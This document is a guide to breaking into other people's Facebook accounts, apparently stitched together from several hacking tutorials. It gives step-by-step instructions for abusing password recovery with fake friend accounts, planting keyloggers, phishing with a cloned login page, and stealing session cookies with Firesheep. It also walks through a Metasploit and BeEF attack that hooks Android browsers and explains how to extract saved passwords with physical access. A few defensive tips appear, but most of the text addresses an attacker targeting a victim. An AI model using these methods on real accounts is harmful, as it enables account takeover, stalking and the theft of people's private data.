HACKING FACEBOOK

ACCOUNTS
We share our lives on Facebook. We share our birthdays and our
anniversaries. We share our vacation plans and locations. We share
the births of our sons and the deaths of our fathers. We share our
most cherished moments and our most painful thoughts. We divulge
every aspect of our lives. We even clamor to see the latest versions
even before they're ready for primetime.
But we sometimes forget who's watching.
We use Facebook as a tool to connect, but there are those people
who use that connectivity for malicious purposes. We reveal what
others can use against us. They know when we're not home and for
how long we're gone. They know the answers to our security
questions. People can practically steal our identities—and that's just
with the visible information we purposely give away through our public
Facebook profile.
The scariest part is that as we get more comfortable with advances in
technology, we actually become more susceptible to hacking. As if we
haven't already done enough to aid hackers in their quest for our data
by sharing publicly, those in the know can get into our emails and
Facebook accounts to steal every other part of our lives that we
intended to keep away from prying eyes.
In fact, you don't even have to be a professional hacker to get into
someone's Facebook account.

It can be as easy as running firesheep on your computer for a few

minutes. In fact, Facebook actually allows people to get into someone
else's Facebook account without knowing their password. All you have
to do is choose three friends to send a code to. You type in the three
codes, and voilà—you're into the account. It's as easy as that.
In this article I'll show you these, and a couple other ways that hackers
(and even regular folks) can hack into someone's Facebook account.
But don't worry, I'll also show you how to prevent it from happening to
you.
Method 1: Reset the Password
The easiest way to "hack" into someone's Facebook is through
resetting the password. This could be easier done by people who are
friends with the person they're trying to hack.
• The first step would be to get your friend's Facebook email login.
If you don't already know it, try looking on their Facebook page in
the Contact Info section.
• Next, click on Forgotten your password? and type in the
victim's email. Their account should come up. Click This is my
account.
• It will ask if you would like to reset the password via the victim's
emails. This doesn't help, so press No longer have access to
these?
• It will now ask How can we reach you? Type in an email that
you have that also isn't linked to any other Facebook account.
• It will now ask you a question. If you're close friends with the
victim, that's great. If you don't know too much about them, make
an educated guess. If you figure it out, you can change the
password. Now you have to wait 24 hours to login to their
account.
• If you don't figure out the question, you can click on Recover
your account with help from friends. This allows you to
choose between three and five friends.
• It will send them passwords, which you may ask them for, and
then type into the next page. You can either create three to five
fake Facebook accounts and add your friend (especially if they
just add anyone), or you can choose three to five close friends of
yours that would be willing to give you the password.
How to Protect Yourself
• Use an email address specifically for your Facebook and don't
put that email address on your profile.
• When choosing a security question and answer, make it difficult.
Make it so that no one can figure it out by simply going through
your Facebook. No pet names, no anniversaries—not even third
grade teacher's names. It's as easy as looking through a
yearbook.
• Learn about recovering your account from friends. You can
select the three friends you want the password sent to. That way
you can protect yourself from a friend and other mutual friends
ganging up on you to get into your account.

Method 2: Use a Keylogger

Software Keylogger
A software keylogger is a program that can record each stroke on the
keyboard that the user makes, most often without their knowledge.
The software has to be downloaded manually on the victim's
computer. It will automatically start capturing keystrokes as soon as
the computer is turned on and remain undetected in the background.
The software can be programmed to send you a summary of all the
keystrokes via email.
CNET has Free key logger, which as the title suggests, is free. If this
isn't what you're looking for, you can search for other free keyloggers
or pay for one.

Hardware Keylogger
These work the same way as the software keylogger, except that a
USB drive with the software needs to be connected to the victim's
computer. The USB drive will save a summary of the keystrokes, so
it's as simple as plugging it to your own computer and extracting the
data. You can look through Keelog for prices, but it's bit higher than
buying the software since you have the buy the USB drive with the
program already on it.
How to Protect Yourself
• Use a firewall. Keyloggers usually send information through the
internet, so a firewall will monitor your computer's online activity
and sniff out anything suspicious.
• Install a password manager. Keyloggers can't steal what you
don't type. Password mangers automatically fill out important
forms without you having to type anything in.
• Update your software. Once a company knows of any exploits in
their software, they work on an update. Stay behind and you
could be susceptible.
• Change passwords. If you still don't feel protected, you can
change your password bi-weekly. It may seem drastic, but it
renders any information a hacker stole useless.

Method 3: Phishing
This option is much more difficult than the rest, but it is also the most
common method to hack someone's account. The most popular type
of phishing involves creating a fake login page. The page can be sent
via email to your victim and will look exactly like the Facebook login
page. If the victim logs in, the information will be sent to you instead of
to Facebook. This process is difficult because you will need to create
a web hosting account and a fake login page.
The easiest way to do this would be to clone the website to make an
exact copy of the facebook login page. Then you'll just need to tweak
the submit form to copy / store / email the login details a victim enters.
Users are very careful now with logging into Facebook through other
links, though, and email phishing filters are getting better every day,
so that only adds to this already difficult process. But, it's still possible,
especially if you clone the entire Facebook website.

Method 4: Stealing Cookies

Cookies allow a website to store information on a user's hard drive
and later retrieve it. These cookies contain important information used
to track a session that a hacker can sniff out and steal if they are on
the same Wi-Fi network as the victim. They don't actually get the login
passwords, but they can still access the victim's account by cloning
the cookies, tricking Facebook into thinking the hacker's browser is
already authenticated.
Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi
connection. It collects the cookies and stores them in a tab on the side
of the browser.
From there, the hacker can click on the saved cookies and access the
victim's account, as long as the victim is still logged in. Once the victim
logs out, it is impossible for the hacker to access the account.
A Couple More Facebook Hacks
For those with a bit more technical skill, check out the Same Origin
Policy Facebook Hack and the somewhat easier, Facebook Password
Extractor. We will continue add more Facebook hacks in the near
future, so keep coming back here.

How to Protect Yourself

• On Facebook, go to your Account Settings and check under
Security. Make sure Secure Browsing is enabled. Firesheep
can't sniff out cookies over encrypted connections like HTTPS,
so try to steer away from HTTP.

It's important to note here that each hack I'll be covering is very
specific. I have said it before, but I feel I need to repeat it again: there
is NO SILVER BULLET that works under all circumstances.
Obviously, the good folks at Facebook have taken precautions to
make certain that their app is not hacked, but if we are creative,
persistent, and ingenious, we can still get in.
Facebook is one of the most secure applications on the Internet and,
despite what you might read on the Internet, it is NOT easy to hack. In
addition, most of those websites on the Internet willing to sell you a
Facebook hack are scams. Don't give them a penny!

In some cases, we might get the password which, of course, will give
us full access to the Facebook account. In other cases, we might just
get access to the account without any rights. In still other schemes, we
might get the cookies that Facebook places in the user's browser and
then place it in our browser for access to the account whenever we
please. In yet another scenario, we can place ourselves between the
user and Facebook in a form of MitM attack, to get the password, etc.

Here I will use a flaw in the stock Android web browser that will
provide us with access to the Facebook account. I hope it goes
without saying that this hack will only work when the user has
accessed their Facebook account from the stock Android browser, not
the Facebook mobile app. Although Google is aware of this security
flaw in their browser, it is not automatically patched or replaced on
existing systems. As a result, this hack will work on most Android
systems.

Same Origin Policy

Same-origin policy (SOP) is one of the key security measures that
every browser should meet. What it means is that browsers are
designed so that webpages can't load code that is not part of their
own resource. This prevents attackers from injecting code without the
authorization of the website owner.

Unfortunately, the default Android browser can be hacked as it does

not enforce the SOP policy adequately. In this way, an attacker can
access the user's other pages that are open in the browser, among
other things. This means that if we can get the user to navigate to our
website and then send them some malicious code, we can then
access other sites that are open in their browser, such as Facebook.
I recommend that you start by installing Kali Linux. In this hack, we will
need two tools, Metasploit and BeEF, both of which are built into our
Kali Linux system.

Step 1: Open Metasploit

Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.

Step 2: Find the Exploit

Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Info
Now that we have loaded the module, let's get some information on
this module. We can do this by typing:
msf > info
As you can see from this info page, this exploit works against all stock
Android browsers before Android 4.4 KitKat. It tells us that this module
allows us to run arbitrary JavaScript in the context of the URL.

Step 4: Show Options

Next, let see what options we need to set for this module to function.
Most importantly, we need to set the REMOTE_JS that I have
highlighted below.
Step 5: Open BeEF
Now, open BeEF. Please take a look at this tutorial on using BeEF, if
you are are unfamiliar the tool.
Step 6: Set JS to BeEF Hook
Back to Metasploit now. We need to set the REMOTE_JS to the hook
on BeEF. Of course, make certain you use the IP of the server that
BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /

Step 7: Run the Server

Now we need to start the Metasploit web server. What will happen
now is that Metasploit will start its web server and serve up the BeEF
hook so that when anyone navigates to that website, it will have their
browser hooked to BeEF.
msf > run

Step 8: Navigate to the Website from an Android Browser

Now we are replicating the behavior of the victim. When they navigate
to the website hosting the hook, it will automatically inject the
JavaScript into their browser and hook it. So, we need to use the stock
browser on an Android device and go to 192.168.1.107:8080, or
whatever the IP is of your website.

Step 9: Hook Browser

When the user/device visits our web server at 192.168.1.107, the
BeEF JavaScript will hook their browser. It will show under the
"Hooked Browser" explorer in BeEF. We now control their browser!

Step 10: Detect if the Browser Is Authenticated to Facebook

Now let's go back to BeEF and go to the "Commands" tab. Under the
"Network" folder we find the "Detect Social Networks" command. This
command will check to see whether the victim is authenticated to
Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower
right.
When we do so, BeEF will return for us the results. As you can see
below, BeEF returned to us that this particular user was not
authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to
Facebook and attempt this command again. Once they have
authenticated to Facebook, we can direct a tab to open the user's
Facebook page, which we will do in our next Facebook hack tutorial.

One of the cardinal rules of hacking is: "If I can get physical access to
the computer... GAME OVER!" This means that if I were given even
just a few moments to the machine itself, I can hack anything I want
from that computer—including Facebook passwords.
I recognize that not all of you are technically savvy, though, that
doesn't mean you can't be with some hard work. So this Facebook
hack is for those of you without either the technical savvy or the work
ethic to become so. All you need is a moment or two of unfettered
physical access to the target's computer and you can easily have their
Facebook password.

Remember Me?
This hack relies upon the fact that most of us want websites to
remember us when we return. We don't want to put in our username
and password every time we want to access the site, so we tell the
browser to "Remember me." In that way, we don't need to re-
authenticate and provide our password, our system simply remembers
it and provides it to the website.
Of course, those passwords must be stored somewhere on our
computer. The key is to know where those passwords are stored and
how to crack the hashed passwords when we find them. For instance,
Mozilla stores the users passwords at:
c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/
**.default/cache2/entries
As you can see in the screenshot below, I have displayed that
directory and password hashes from a Windows 7 computer running
Firefox 36. These are all the saved passwords from various websites
that Firefox has stored.

Note that the location of these passwords is in different places for

each browser and sometimes in different places on different operating
systems with the same browser.

Elcomsoft's Facebook Password Extraction Tool

Fortunately for us, there is a company in Russia named Elcomsoft.
This company employs first-rate cryptographers and they develop and
sell software to crack various password encryption schemes. (As a
side note, a cryptographer from Elcomsoft was the first person
arrested and prosecuted under the DCMA when he came to the U.S.
for a conference. He was eventually acquitted.)
Their software is listed as digital forensic tools, but they can just as
easily be used for hacking purposes. One of their tools was used for
the iCloud hackthat revealed nude photos of Jennifer Lawrence and
other Hollywood stars in August 2014.
Elcomsoft developed a Windows tool named Facebook Password
Extractor (FPE, for short) that extracts the user's Facebook password
from its location on the user's system (the user must have used the
"Remember me" feature) and then cracks it. Of course, we need
physical access to the system to do this in most cases. Alternatively, if
we can hack their system, we could upload this tool to the target
system and then use it or we could simply download the user's
browser password file and use this tool locally on our system.
You can download this free tool from Elcomsoft’s website, which
officially supports the following web browsers (though it may work on
newer versions).
• Microsoft Internet Explorer (up to IE9)
• Mozilla Firefox (up to Firefox 4)
• Apple Safari (up to Safari 5)
• Opera (up to Opera 11)
• Google Chrome (up to Chrome 11)
The process of using this tool is almost idiot-proof. (Almost a
requirement for Facebook hacking, wouldn't you agree?) You simply
install it on the system whose Facebook password you want to extract
and it does everything else.

One of the drawbacks to using this tool is that Elcomsoft released it

back in 2011 and it has not been updated since.